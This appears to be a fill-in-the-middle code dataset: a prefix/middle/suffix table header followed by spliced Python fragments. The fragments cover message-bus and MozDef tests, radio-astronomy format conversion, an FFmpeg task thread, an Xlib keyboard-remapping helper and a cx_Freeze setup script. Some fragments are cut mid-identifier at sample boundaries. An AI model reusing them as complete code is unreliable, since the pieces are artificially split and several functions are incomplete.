prefix stringlengths 0 918k | middle stringlengths 0 812k | suffix stringlengths 0 962k |
|---|---|---|
import unittest
from jsonschema import SchemaError
from minibus import MiniBusClient
class SyntaxTest(unittest.TestCase):
    """Checks schema handling in MiniBusClient.subscribe().

    Covers a valid schema, an invalid schema ("orange" is not a JSON-schema
    type), a conflicting schema on an existing topic, and a duplicate
    callback registration.
    """

    def setUp(self):
        # Fresh client per test so subscriptions don't leak across tests.
        self.client = MiniBusClient()

    def callback(self):
        """No-op subscriber callback."""
        pass

    def callback2(self):
        """Second no-op callback, used by the schema-mismatch test."""
        pass

    def test_sub_good(self):
        # A well-formed schema must be accepted without raising.
        self.client.subscribe("test_sub_good", {'type': "number"}, self.callback)

    def test_sub_bad_schema(self):
        # "orange" is not a valid JSON-schema type, so jsonschema rejects it.
        self.assertRaises(SchemaError, self.client.subscribe,
                          "test_sub_bad_schema", {"type": "orange"}, self.callback)

    def test_sub_schema_mismatch(self):
        # Subscribing twice to one topic with conflicting schemas must fail.
        self.client.subscribe("test_sub_schema_mismatch", {"type": "number"}, self.callback)
        self.assertRaises(Exception, self.client.subscribe,
                          "test_sub_schema_mismatch", {"type": "string"}, self.callback2)

    def test_sub_schema_dupcallback(self):
        # Registering the same callback twice on one topic must fail.
        self.client.subscribe("test_sub_schema_dupcallback", {"type": "number"}, self.callback)
        self.assertRaises(Exception, self.client.subscribe,
                          "test_sub_schema_dupcallback", {"type": "number"}, self.callback)
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
|
from model.contact import Contact
from random import randrange
def test_edit_contact(app, db, check_ui):
    """Edit a random contact and verify the DB (and optionally UI) state.

    Ensures at least one contact exists, edits a random one (keeping its
    id), then checks the stored list matches the expected list.
    """
    # Precondition: need at least one contact to edit.
    if len(db.get_contact_list()) == 0:
        app.contact.create(Contact(first_name="Sabina", last_name="test", company="Pewex",
                                   address="osiedle", phone_home="123456789", e_mail="sabina@sabina.pl",
                                   year="2016",))
    old_contact = db.get_contact_list()
    index = randrange(len(old_contact))
    contact = Contact(first_name='Kasia', last_name='Bober')
    # Keep the id so the edited record can be matched against the DB row.
    contact.id = old_contact[index].id
    app.contact.edit_contact_by_index(index, contact)
    assert len(old_contact) == app.contact.count()
    new_contact = db.get_contact_list()
    old_contact[index] = contact
    assert old_contact == new_contact
    if check_ui:
        # UI comparison is slow, so it is gated behind the check_ui fixture.
        assert sorted(new_contact, key=Contact.id_or_max) == sorted(
            app.group.get_contact_list(), key=Contact.id_or_max
        )
efAssetHint(MozDefEvent):
def validate(self):
if not MozDefEvent.validate(self):
return False
# A hint event should always have details
if len(self.details.keys()) == 0:
return False
return True
def __init__(self, url):
MozDefEvent.__init__(self, url)
self._msgtype = self.MSGTYPE_ASSETHINT
self._category = 'asset_hint'
class MozDefCompliance(MozDefEvent):
    """Compliance-item event whose send log must follow a fixed layout."""

    def validate_log(self):
        """Return True when _sendlog carries every required nested field."""
        if 'details' not in self._sendlog:
            return False
        details = self._sendlog['details']
        # Check top-level keys first so the nested lookups below are safe.
        for required in ('target', 'policy', 'check', 'compliance', 'link',
                         'utctimestamp'):
            if required not in details.keys():
                return False
        if any(key not in details['policy'].keys()
               for key in ('level', 'name', 'url')):
            return False
        if any(key not in details['check'].keys()
               for key in ('description', 'location', 'name', 'test')):
            return False
        return all(key in details['check']['test'].keys()
                   for key in ('type', 'value'))

    def __init__(self, url):
        """Initialize as a MozDef event tagged as a compliance item."""
        MozDefEvent.__init__(self, url)
        self._category = 'complianceitems'
        self._msgtype = self.MSGTYPE_COMPLIANCE
class MozDefTests(unittest.TestCase):
    """Tests for MozDef message, event, vuln, compliance, hint and RRA types."""

    def create_valid_event(self):
        # Minimal well-formed generic event fields.
        self.emsg_summary = 'a test event'
        self.emsg_tags = ['generic', 'test']
        self.emsg_details = {'one': 1, 'two': 'two'}

    def create_valid_vuln(self):
        # A complete vulnerability payload accepted by MozDefVulnerability.
        self.vulnmsg = {}
        self.vulnmsg['description'] = 'system vulnerability management ' \
            'automation'
        self.vulnmsg['utctimestamp'] = '2015-01-21T15:33:51.136378+00:00'
        self.vulnmsg['sourcename'] = 'development'
        self.vulnmsg['asset'] = {}
        self.vulnmsg['asset']['assetid'] = 23
        self.vulnmsg['asset']['ipv4address'] = '1.2.3.4'
        self.vulnmsg['asset']['macaddress'] = ''
        self.vulnmsg['asset']['hostname'] = 'git.mozilla.com'
        self.vulnmsg['vuln'] = {}
        self.vulnmsg['vuln']['status'] = 'new'
        self.vulnmsg['vuln']['vulnid'] = 'nexpose:43883'
        self.vulnmsg['vuln']['title'] = \
            'RHSA-2013:1475: postgresql and postgresql84 security update'
        self.vulnmsg['vuln']['discovery_time'] = 1421845863
        self.vulnmsg['vuln']['age_days'] = 32.7
        self.vulnmsg['vuln']['known_malware'] = False
        self.vulnmsg['vuln']['known_exploits'] = False
        self.vulnmsg['vuln']['cvss'] = 8.5
        self.vulnmsg['vuln']['cves'] = ['CVE-2013-022', 'CVE-2013-1900']

    def create_valid_comp(self):
        # A complete compliance payload accepted by MozDefCompliance.
        self.compmsg = {}
        self.compmsg['target'] = 'www.mozilla.com'
        self.compmsg['utctimestamp'] = '2015-03-04T18:25:52.849272+00:00'
        self.compmsg['tags'] = {
            'operator': 'it',
            'autogroup': 'opsec'
        }
        self.compmsg['compliance'] = True
        self.compmsg['link'] = 'http://a.url'
        self.compmsg['policy'] = {
            'url': 'http://another.url',
            'name': 'system',
            'level': 'medium'
        }
        self.compmsg['check'] = {
            'test': {
                'type': 'nexpose',
                'name': 'assess',
                'value': 'nexpose'
            },
            'location': 'endpoint',
            'ref': 'sysmediumupdates1',
            'name': 'vulnerability scanner check',
            'description': 'validate system patch level'
        }

    def setUp(self):
        self.create_valid_vuln()
        self.create_valid_comp()
        self.create_valid_event()

    def testFailMessageSend(self):
        # The base message type cannot be sent directly.
        m = MozDefMessage('http://127.0.0.1')
        with self.assertRaises(MozDefError):
            m.send()

    def testFailEventSend(self):
        # Sending to an unreachable endpoint must raise.
        m = MozDefEvent('http://127.0.0.1:1/nonexistent')
        with self.assertRaises(Exception):
            m.send()

    def testMozdefMessage(self):
        m = MozDefMessage('http://127.0.0.1')
        self.assertIsNotNone(m)
        self.assertIsNotNone(m.hostname)
        self.assertEqual(m._url, 'http://127.0.0.1')
        m.hostname = 'examplehostname'
        self.assertEqual(m.hostname, 'examplehostname')

    def testMozdefEvent(self):
        m = MozDefEvent('http://127.0.0.1')
        self.assertIsNotNone(m)
        self.assertEqual(m._msgtype, MozDefMessage.MSGTYPE_EVENT)
        self.assertIsNotNone(m.hostname)
        self.assertEqual(m._url, 'http://127.0.0.1')
        m.hostname = 'examplehostname'
        self.assertEqual(m.hostname, 'examplehostname')

    def testMozdefEventValidate(self):
        # An event validates only once it has a summary.
        m = MozDefEvent('http://127.0.0.1')
        self.assertFalse(m.validate())
        m.summary = 'test event'
        self.assertTrue(m.validate())

    def testMozdefEventConstruct(self):
        m = MozDefEvent('http://127.0.0.1')
        m.summary = 'test event'
        m.construct()
        self.assertEqual(m._sendlog['category'], 'event')
        self.assertEqual(m._sendlog['summary'], 'test event')

    def testMozdefEventHostname(self):
        m = MozDefEvent('http://127.0.0.1')
        m.hostname = 'samplehostname'
        self.assertEqual(m.hostname, 'samplehostname')

    def testMozdefVulnValidate(self):
        # The event validates, but its log only after a payload is set.
        m = MozDefVulnerability('http://127.0.0.1')
        self.assertTrue(m.validate())
        m.construct()
        self.assertFalse(m.validate_log())
        m.log = self.vulnmsg
        m.construct()
        self.assertTrue(m.validate_log())

    def testMozdefComplianceValidate(self):
        m = MozDefCompliance('http://127.0.0.1')
        self.assertFalse(m.validate())
        m.summary = 'compliance item'
        self.assertTrue(m.validate())
        m.construct()
        self.assertFalse(m.validate_log())
        m.details = self.compmsg
        m.construct()
        self.assertTrue(m.validate_log())

    def testMozdefEventSyslog(self):
        m = MozDefEvent('http://127.0.0.1')
        m.summary = self.emsg_summary
        m.tags = self.emsg_tags
        m.details = self.emsg_details
        m.set_severity(MozDefEvent.SEVERITY_CRITICAL)
        m.construct()
        s = m.syslog_convert()
        self.assertIsNotNone(s)
        # only_syslog avoids a network send in the test environment.
        m.set_send_to_syslog(True, only_syslog=True)
        m.send()

    def testMozdefCompSyslog(self):
        m = MozDefCompliance('http://127.0.0.1')
        m.log = self.compmsg
        self.assertIsNotNone(m.syslog_convert())

    def testAssetHintValidate(self):
        # Hints additionally require non-empty details.
        m = MozDefAssetHint('http://127.0.0.1')
        self.assertFalse(m.validate())
        m.summary = 'an asset hint event'
        self.assertFalse(m.validate())
        m.details = {'hostname': 'test'}
        self.assertTrue(m.validate())

    def testAssetHint(self):
        m = MozDefAssetHint('http://127.0.0.1')
        self.assertIsNotNone(m)

    def testRRAValidate(self):
        m = MozDefRRA('http://127.0.0.1')
        self.assertFalse(m.validate())
        m.summary = 'an RRA event'
        m.category = 'rra_data'
        self.assertFalse(m.validate())
        m.details = {'metadata': {'service': 'test'}}
        self.assertTrue(m.validate())

    def testRRA(self):
        m = MozDefRRA('http://127.0.0.1')
        self.assertIsNotNone(m)

    def testSimpleMsg(self):
        m = MozDefMsg('http://127.0.0.1', tags=['openvpn', 'duosecurity'])
        self.assertIsNotNone(m)

    def testSimpleSqs(self):
        m = MozDefMsg('http://127.0.0.1', tags=['openvpn', 'duosecurity'])
        if not boto_loaded:
            raise ImportError("Boto3 is not loaded")
        m.sendToSqs = True
        m.sqsRegion = 'us-west-1'
        m.sqsQueueName = 'test'
        m.sqsAWSAccountId = 'test'
        m.send('hi')
        self.assertIsNotNone(m)

    def testSimpleSyslog(self):
        m = MozDefMsg('http://127.0.0.1', tags=['openvpn', 'duosecurity'])
        m.sendToSyslog = True
        m.syslogOnly = True
        m.fire_and_forget_mode = True
        m.log['somefield'] = 'test'
        # Sending with no message payload is an error.
        with self.assertRaises(MozDefError):
            m.send()
        m.send('hi')
def testSimpleSyslogDetails(self):
m = MozDefMsg('http://127.0.0.1')
|
e=32.*u.MHz, complex_data=False)
data = fr.read(20000) # enough to fill one EDV3 frame.
time1 = fr.tell(unit='time')
# Get a file name in our temporary testing directory.
vdif_file = str(tmpdir.join('converted.vdif'))
# create and fill vdif file with converted data.
with vdif.open(vdif_file, 'ws', header0=header,
nthread=data.shape[1]) as fw:
assert (fw.tell(unit='time') - m5h.time) < 2. * u.ns
fw.write(data)
assert (fw.tell(unit='time') - time1) < 2. * u.ns
# Check two files contain same information.
with mark5b.open(SAMPLE_M5B, 'rs', sample_rate=32.*u.MHz, kday=56000,
nchan=8, bps=2) as fm, vdif.open(vdif_file,
'rs') as fv:
assert fm.header0.time == fv.header0.time
dm = fm.read(20000)
dv = fv.read(20000)
assert np.all(dm == dv)
assert fm.offset == fv.offset
assert fm.tell(unit='time') == fv.tell(unit='time')
# Convert VDIF file back to Mark 5B
mark5b_new_file = str(tmpdir.join('reconverted.mark5b'))
hv = fv.header0
hm = fm.header0
# Here, we fill some unimportant Mark 5B header information by
# hand, so we can compare byte-for-byte.
with mark5b.open(mark5b_new_file, 'ws', sample_rate=hv.sample_rate,
nchan=dv.shape[1], bps=hv.bps,
time=hv.time, user=hm['user'],
internal_tvg=hm['internal_tvg']) as fw:
fw.write(dv)
with open(SAMPLE_M5B, 'rb') as fh_orig, open(mark5b_new_file,
'rb') as fh_new:
assert fh_orig.read() == fh_new.read()
class TestVDIF3ToMark5B:
    """Real conversion: VDIF EDV 3 to Mark5B."""

    def test_header(self):
        # A Mark 5B header built from the VDIF time must round-trip the time.
        with open(SAMPLE_VDIF, 'rb') as fh:
            vh = vdif.VDIFHeader.fromfile(fh)
        header = mark5b.Mark5BHeader.fromvalues(time=vh.time)
        assert header.time == vh.time

    def test_stream(self, tmpdir):
        with vdif.open(SAMPLE_VDIF, 'rs') as fr:
            vh = fr.header0
            data = fr.read(20000)  # enough to fill two Mark 5B frames.
        fl = str(tmpdir.join('test.m5b'))
        with mark5b.open(fl, 'ws', sample_rate=vh.sample_rate,
                         nchan=data.shape[1], bps=vh.bps, time=vh.time) as fw:
            fw.write(data)
        # Re-read both files and check they decode to identical samples.
        with vdif.open(SAMPLE_VDIF, 'rs') as fv, mark5b.open(
                fl, 'rs', sample_rate=32.*u.MHz,
                ref_time=Time(57000, format='mjd'), nchan=8, bps=2) as fm:
            assert fv.header0.time == fm.header0.time
            dv = fv.read(20000)
            dm = fm.read(20000)
            assert np.all(dm == dv)
            assert fm.offset == fv.offset
            assert fm.tell(unit='time') == fv.tell(unit='time')
class TestVDIF0BPS1ToMark5B:
    """Real conversion: VDIF EDV 3, BPS 1 to Mark 5B."""

    def test_stream(self, tmpdir):
        # Read one Mark 5B frame's worth of 1-bit samples from the sample file.
        with vdif.open(SAMPLE_BPS1_VDIF, 'rs', sample_rate=8*u.MHz) as fr:
            start_time = fr.start_time
            data = fr.read(5000)  # Just one Mark 5B frame.
        fl = str(tmpdir.join('test.m5b'))
        # Write the same data twice, so the copy holds two identical frames.
        with mark5b.open(fl, 'ws', sample_rate=8.*u.MHz, nchan=data.shape[1],
                         bps=1, time=start_time) as fw:
            fw.write(data)
            fw.write(data)
        with vdif.open(SAMPLE_BPS1_VDIF, 'rs',
                       sample_rate=8*u.MHz) as fv, mark5b.open(
                           fl, 'rs', sample_rate=8.*u.MHz, nchan=16, bps=1,
                           ref_time=Time('2018-09-01')) as fm:
            assert fv.start_time == fm.start_time
            dv = fv.read(5000)
            dm = fm.read(5000)
            assert np.all(dm == dv)
            assert fm.offset == fv.offset
            assert fm.tell(unit='time') == fv.tell(unit='time')
            # The second frame was written from the same data: must match too.
            dm = fm.read(5000)
            assert np.all(dm == dv)
class TestMark4ToVDIF1:
    """Real conversion: Mark 4 to VDIF EDV 1, and back to Mark 4.

    Here, need to use a VDIF format with a flexible size, since we want
    to create invalid frames corresponding to the pieces of data overwritten
    by the Mark 4 header.
    """

    def test_header(self):
        with open(SAMPLE_M4, 'rb') as fh:
            fh.seek(0xa88)
            m4h = mark4.Mark4Header.fromfile(fh, ntrack=64, decade=2010)
        # Check that we have enough information to create VDIF EDV 1 header.
        header = vdif.VDIFHeader.fromvalues(
            edv=1, bps=m4h.bps, nchan=1, station='Ar', time=m4h.time,
            sample_rate=32.*u.MHz, payload_nbytes=640*2//8, complex_data=False)
        assert abs(header.time - m4h.time) < 2. * u.ns

    def test_stream(self, tmpdir):
        with mark4.open(SAMPLE_M4, 'rs', sample_rate=32.*u.MHz,
                        ntrack=64, decade=2010) as fr:
            m4header0 = fr.header0
            start_time = fr.start_time
            vheader0 = vdif.VDIFHeader.fromvalues(
                edv=1, bps=m4header0.bps, nchan=1, station='Ar',
                time=start_time, sample_rate=32.*u.MHz,
                payload_nbytes=640*2//8, complex_data=False)
            assert abs(vheader0.time - start_time) < 2. * u.ns
            data = fr.read(80000)  # full Mark 4 frame
            offset1 = fr.tell()
            time1 = fr.tell(unit='time')
            number_of_bytes = fr.fh_raw.tell() - 0xa88
        with open(SAMPLE_M4, 'rb') as fh:
            fh.seek(0xa88)
            orig_bytes = fh.read(number_of_bytes)
        fl = str(tmpdir.join('test.vdif'))
        with vdif.open(fl, 'ws', header0=vheader0,
                       nthread=data.shape[1]) as fw:
            assert (fw.tell(unit='time') - start_time) < 2. * u.ns
            # Write first VDIF frame, matching Mark 4 Header, hence invalid.
            fw.write(data[:160], valid=False)
            # Write remaining VDIF frames, with valid data.
            fw.write(data[160:])
            assert (fw.tell(unit='time') - time1) < 2. * u.ns
        with vdif.open(fl, 'rs') as fv:
            assert abs(fv.header0.time - start_time) < 2. * u.ns
            expected = vheader0.copy()
            expected['invalid_data'] = True
            assert fv.header0 == expected
            dv = fv.read(80000)
            assert np.all(dv == data)
            assert fv.offset == offset1
            assert abs(fv.tell(unit='time') - time1) < 2.*u.ns
        # Convert VDIF file back to Mark 4, and check byte-for-byte.
        fl2 = str(tmpdir.join('test.m4'))
        with mark4.open(fl2, 'ws', sample_rate=vheader0.sample_rate,
                        ntrack=64, bps=2, fanout=4, time=vheader0.time,
                        system_id=108) as fw:
            fw.write(dv)
        with open(fl2, 'rb') as fh:
            conv_bytes = fh.read()
        # BUG FIX: the original compared len(conv_bytes) with itself, which
        # is always true; the intent is original vs. converted length.
        assert len(orig_bytes) == len(conv_bytes)
        assert orig_bytes == conv_bytes
class TestDADAToVDIF1:
"""Real conversion: DADA to VDIF EDV 1, and back to DADA.
Here, we use a VDIF format with a flexible size so it is easier to fit
the dada file inside the VDIF one.
"""
    def get_vdif_header(self, header):
        """Build a VDIF EDV 1 header mirroring a DADA header.

        The payload is set to half the DADA payload, and the two-letter
        station code is taken from the telescope name.
        """
        return vdif.VDIFHeader.fromvalues(
            edv=1, time=header.time, sample_rate=header.sample_rate,
            bps=header.bps, nchan=header['NCHAN'],
            complex_data=header.complex_data,
            payload_nbytes=header.payload_nbytes // 2,
            station=header['TELESCOPE'][:2])
def get_vdif_data(self, dada_data):
return (dada_data + 0.5 + 0.5j) / EIGHT_BIT_1_SIGMA
def get_dada_data(self, vdif_data):
return vdif_data * EIGHT_BIT_1_SIGMA - 0.5 - 0.5j
def test_header(self):
with open(SAMPLE_DADA, 'rb') as fh:
ddh = dada.DADAHeader.fromfile(fh)
# Check that we have enough information to create VDIF EDV 1 header.
header = self.get_vdif_header(ddh)
assert abs(header.time - ddh.time) < 2. |
#
# acrosby 2013
#
def __call__(nc):
    """Return every global attribute of *nc* as a plain dict.

    NOTE(review): declared as __call__ with the dataset-like object as the
    first argument; presumably attached to a class defined elsewhere
    (the enclosing definition is not visible here) -- confirm.
    """
    return {attr: nc.getncattr(attr) for attr in nc.ncattrs()}
|
# -*- coding: UTF-8 -*-
"""
Name: generic_task.py
Porpose: Execute a generic task with FFmpeg
Compatibility: Python3 (Unix, Windows)
Author: Gianluca Pernigotto <jeanlucperni@gmail.com>
Copyright: (c) 2018/2022 Gianluca Pernigotto <jeanlucperni@gmail.com>
license: GPL3
Rev: Feb.14.2022
Code checker:
flake8: --ignore F821, W504
pylint: --ignore E0602, E1101
This file is part of Videomass.
Videomass is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Videomass is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Videomass. If not, see <http://www.gnu.org/licenses/>.
"""
from threading import Thread
import platform
import subprocess
import wx
from videomass.vdms_utils.utils import Popen
if not platform.system() == 'Windows':
import shlex
class FFmpegGenericTask(Thread):
    """
    Run a generic task with FFmpeg as a separate thread.
    This class does not redirect any progress output information
    for debugging, however you can get the exit status message

    USE:
        thread = FFmpegGenericTask(args)
        thread.join()
        error = thread.status
        if error:
            print('%s' % error)
            return
    """
    # Application settings shared by every task.  Resolved once at class
    # creation time, so a wx.App instance must already exist when this
    # module is imported.
    get = wx.GetApp()
    appdata = get.appset

    def __init__(self, param):
        """
        Attributes defined here:
        self.param, a string containing the command parameters
        of FFmpeg, excluding the command itself `ffmpeg`
        self.status, If the exit status is true (which can be an
        exception or error message given by returncode) it must be
        handled appropriately, in the other case it is None.
        """
        self.param = param
        self.status = None
        Thread.__init__(self)
        # The task starts running as soon as the object is constructed.
        self.start()
    # ----------------------------------------------------------------#

    def run(self):
        """
        Get and redirect output errors on p.returncode instance and
        OSError exception. Otherwise the getted output is None
        """
        # Build the full command line from app settings plus the task's
        # own parameters ("ffmpeg+params" is a key in the settings dict).
        cmd = (f'"{FFmpegGenericTask.appdata["ffmpeg_cmd"]}" '
               f'{FFmpegGenericTask.appdata["ffmpegloglev"]} '
               f'{FFmpegGenericTask.appdata["ffmpeg+params"]} '
               f'{self.param}')
        if not platform.system() == 'Windows':
            # POSIX: Popen expects an argv list rather than one string.
            cmd = shlex.split(cmd)
        try:
            with Popen(cmd,
                       stderr=subprocess.PIPE,
                       universal_newlines=True,
                       ) as proc:
                error = proc.communicate()

                if proc.returncode:  # ffmpeg error
                    if error[1]:
                        self.status = error[1]
                    else:
                        self.status = "Unrecognized error"
                    return

        except OSError as err:  # command not found
            self.status = err
            return
|
#!/usr/bin/env python
# coding: utf-8
from .interactiveapp import InteractiveApplication, ENCODING
class InteractiveLoopApplication(InteractiveApplication):
    """Interactive application that repeatedly runs a function until it
    signals exit (or the user presses Ctrl-C)."""

    def __init__(self, name, desc, version,
                 padding, margin, suffix, encoding=ENCODING):
        super(InteractiveLoopApplication, self).__init__(
            name, desc, version, padding, margin, suffix, encoding)
        # loop status values the looped function returns
        self.STATUS_EXIT = 0
        self.STATUS_CONTINUE = 1

    def loop(self, func):
        """Wrap *func* in a loop that runs while it returns STATUS_CONTINUE.

        KeyboardInterrupt terminates with an error message; the wrapper
        always exits the application with status 0 when the loop ends.
        """
        def mainloop():
            loop_flag = self.STATUS_CONTINUE
            while loop_flag == self.STATUS_CONTINUE:
                try:
                    loop_flag = func()
                except KeyboardInterrupt:
                    self.write_error("Terminated.")
                    self.exit(0)
            self.exit(0)
        return mainloop
|
org/licenses.
# contact: elmamyra@gmail.com
# -*- coding: utf-8 -*-
from Xlib.display import Display
from Xlib import X, error
import Xlib
from collections import namedtuple
from gtk import gdk
import gtk
from subprocess import Popen, PIPE
from threading import Timer
from itertools import groupby
from operator import itemgetter
keyEvent = namedtuple('keyEvent', ['type', 'keycode', 'modMask'])
DEAD_KEYS = (
'grave',
'acute',
'circumflex',
'tilde',
'macron',
'breve',
'abovedot',
'diaeresis',
'ring',
'doubleacute',
'caron',
'cedilla',
'ogonek',
'belowdot',
'hook',
'horn',
'stroke',
'schwa',
'SCHWA',
)
LEVEL_MOD = (0, X.ShiftMask, X.Mod5Mask, X.ShiftMask | X.Mod5Mask, X.ControlMask | X.Mod1Mask)
class KeyTools:
KEY_PRESS = X.KeyPress
KEY_RELEASE = X.KeyRelease
    def __init__(self):
        """Open the X display and cache keyboard and clipboard handles."""
        self._xdisplay = Display()
        self._xroot = self._xdisplay.screen().root
        self._clipboard = gtk.clipboard_get()
        self._clipPrimay = gtk.clipboard_get("PRIMARY")
        # (keycode, modifier mask) used for the paste key sequence;
        # presumably Shift+<keycode 118> -- TODO confirm against usage.
        self._entryForPaste = 118, X.ShiftMask
        self._group = 0  # keyboard layout group currently considered active
        self.loadModifiers()
        self._keymap = gdk.keymap_get_default()  # @UndefinedVariable
    def loadModifiers(self):
        """Build modifier keycode tables from the X modifier mapping.

        self._modifiers holds one keycode list per modifier bit;
        self._modifierList is the flat list of all modifier keycodes.
        """
        self._modifiers = []
        self._modifierList = []
        for key in self._xdisplay.get_modifier_mapping():
            li = [k for k in key if k]
            # for altgr key: treat keycode 108 as an alias when 92 is bound
            if 92 in li:
                li.append(108)
            self._modifierList += li
            self._modifiers.append(li)
def filterGroup(self, entries):
if entries:
return [e for e in entries if e[-2] == self._group]
return []
    def remapKey(self, keycode, keysyms):
        """Rewrite the keyboard mapping for *keycode*.

        *keysyms* holds up to four keysyms; after padding, the first two go
        into mapping slots 0-1 and the last two into slots 4-5 (presumably
        the two layout groups -- confirm); other slots are preserved.
        """
        allKeysyms = list(self._xdisplay.get_keyboard_mapping(keycode, 1)[0])
        keysyms = keysyms + [0]*(4 - len(keysyms))  # pad to four entries
        allKeysyms[:2] = keysyms[:2]
        allKeysyms[4:6] = keysyms[2:]
        self._xdisplay.change_keyboard_mapping(keycode, [allKeysyms])
        self._xdisplay.sync()
def resetMapping(self):
try:
process = Popen('setxkbmap -print -verbose 7'.split(), stdout=PIPE, stderr=PIPE)
except OSError:
print 'install setxkbmap'
for line in process.stderr:
print 'setxkbmap error: {}'.format(line)
layout = variant = ''
for line in process.stdout:
line = line.rstrip()
if line == '':
break
if line.startswith('layout:'):
layout = line.split()[1]
elif line.startswith('variant:'):
variant = line.split()[1]
break
command = ['setxkbmap']
if layout:
command += ['-layout', layout]
if variant:
command += ['-variant', variant]
if layout or command:
try:
process = Popen(command, stdout=PIPE, stderr=PIPE)
except OSError:
print 'install setxkbmap'
for line in process.stderr:
print 'setxkbmap error: {}'.format(line)
    def isModifier(self, keycode):
        """True when *keycode* is bound to any modifier."""
        return keycode in self._modifierList
def getModMask(self, keycode):
for i, mods in enumerate(self._modifiers):
if keycode in mods:
return 2**i
return 0
    def modifiersKeycodeList(self):
        """Flat list of every keycode bound to a modifier."""
        return self._modifierList
    def numMask(self):
        """The Mod2 bitmask (conventionally NumLock under X)."""
        return X.Mod2Mask
    def keycode2char(self, keycode, mods, group=0):
        """Translate a keycode + modifier state to (character, keysym name).

        Either element may be '' when the state yields no printable
        character or no named keysym.
        """
        char = ''
        name = ''
        info = self._keymap.translate_keyboard_state(keycode, mods, group)
        if info:
            keysym = info[0]
            char = gdk.keyval_to_unicode(keysym)  # @UndefinedVariable
            if char:
                char = unichr(char)  # Python 2: code point -> unicode char
            name = gdk.keyval_name(keysym)  # @UndefinedVariable
        return char or '', name or ''
def removeNumLockMask(self, keycode, mod):
if not self.isKeypadKey(keycode) and mod & X.Mod2Mask:
return mod ^ X.Mod2Mask
return mod
def entry2keysym(self, keycode, modMask):
info = self._keymap.translate_keyboard_state(keycode, modMask, self._group)
if info:
return info[0]
return None
def entry2name(self, keycode, modMask):
keysym = self.entry2keysym(keycode, modMask)
if keysym is not None:
return gdk.keyval_name(keysym) # @UndefinedVariable
return None
    def keycode2entries(self, keycode):
        """Keymap entries for *keycode*, restricted to the active group."""
        return self.filterGroup(self._keymap.get_entries_for_keycode(keycode))
def keysym2entry(self, keysym):
if not keysym:
return None
infos = self._keymap.get_entries_for_keyval(keysym) # @UndefinedVariable
if infos:
for info in infos:
keyc | ode, group, level = info
if group == self._group:
if level < len(LEVEL_MOD):
mod = LEVEL_MOD[level]
return keycode, mod
return None
def keysym2deadEntries(self, keysym):
resp = ()
entry = self.keysym2entry(keysym)
if entry:
keycode, mod = entry
resp = ((keycode, m | od), )
if not resp:
deadKeys = self.findWithDeadKey(keysym)
if deadKeys:
keyKeysym, deadKeysym = deadKeys
keyKeycodes = self.keysym2entry(keyKeysym)
deadKeycodes = self.keysym2entry(deadKeysym)
if keyKeycodes and deadKeycodes:
keyKeycode, keyMod = keyKeycodes
deadKeycode, deadMod = deadKeycodes
resp = ((deadKeycode, deadMod), (keyKeycode, keyMod))
return resp
    def keycode2charsAndNames(self, keycode):
        """Characters and keysym names for up to four levels of *keycode*.

        Trailing entries whose name is empty are stripped.
        NOTE(review): keysym2char/keysym2name are called unqualified; they
        are not methods of this class, so they must be module-level helpers
        defined outside this view -- confirm.
        NOTE(review): 'while not names[-1]' raises IndexError when the list
        empties (e.g. no entries, or every name empty) -- confirm intended.
        """
        entries = self.keycode2entries(keycode)
        chars = []
        names = []
        for entry in entries:
            chars.append(keysym2char(entry[0]))
            names.append(keysym2name(entry[0]))
            if len(chars) >= 4:
                break
        while not names[-1]:
            chars.pop(-1)
            names.pop(-1)
        return chars, names
def keycode2keysyms(self, keycode):
entries = self.keycode2entries(keycode)
return [e[0] for e in entries][:4]
def char2entries(self, char):
keysym = gdk.unicode_to_keyval(ord(char)) # @UndefinedVariable
if keysym:
return self.keysym2deadEntries(keysym)
return ()
    def findWithDeadKey(self, keysym):
        """Split an accented keysym into (base keysym, dead-key keysym).

        Matches the keysym's name against the known DEAD_KEYS suffixes and
        returns the gdk keyvals of the base key and the 'dead_*' key.
        Returns None when no dead-key suffix matches.
        """
        name = gdk.keyval_name(keysym)  # @UndefinedVariable
        for deadName in DEAD_KEYS:
            if name.endswith(deadName):
                keyName = name[:-len(deadName)]
                # Some gdk dead-key names differ from the suffix used in
                # compound keysym names.
                deadName = {'ring': 'abovering',
                            'schwa': 'small_schwa',
                            'SCHWA': 'capital_schwa'}.get(deadName, deadName)
                deadName = 'dead_' + deadName
                keyKeysym = gdk.keyval_from_name(keyName)  # @UndefinedVariable
                deadSym = gdk.keyval_from_name(deadName)  # @UndefinedVariable
                return keyKeysym, deadSym
        return None
    def isKeypadKey(self, keycode):
        """True when *keycode* maps to a KP_* keysym in the active group."""
        entry = self._keymap.get_entries_for_keycode(keycode)
        if entry:
            for info in entry:
                if info[2] == self._group:
                    name = gdk.keyval_name(info[0])  # @UndefinedVariable
                    if name and name.startswith('KP_'):
                        return True
        return False
def grabKey(self, keycode, modMask):
self._xroot.grab_key(keycode, modMask, 0, X.GrabModeAsync, X.GrabModeAsync)
if not self.isKeypadKey(keycode) and not modM |
import sys

from cx_Freeze import setup, Executable

# Dependencies are automatically detected, but it might need
# fine tuning.
buildOptions = dict(packages=["pyglet", "polytanks", "codecs", "encodings", "selectors"],
                    excludes=["tkinter", "PyQt5", "PIL", "setuptools"],
                    include_files="assets")

# Windows GUI application (no console window); default base elsewhere.
base = 'Win32GUI' if sys.platform == 'win32' else None

executables = [
    Executable('main.py', base=base, targetName='cliente.exe')
]

setup(name='polytanks-cliente',
      version='1.0',
      description='Cliente de Polytanks',
      options=dict(build_exe=buildOptions),
      executables=executables)
|
otalLinks)+'[/B].'
dialogWait.update(percent,'[B]Will load instantly from now on[/B]',remaining_display)
if (dialogWait.iscanceled()):
return False
dialogWait.close()
del dialogWait
main.CloseAllDialogs()
main.GA("HD","Oneclickwatch")
def LISTTV3(murl):
    """Populate the TV-shows listing from oneclickwatch.org.

    Scrapes five index pages for (title, link, thumbnail) triples and adds
    one playable entry per show while updating a progress dialog.
    Returns False when the user cancels the dialog.
    """
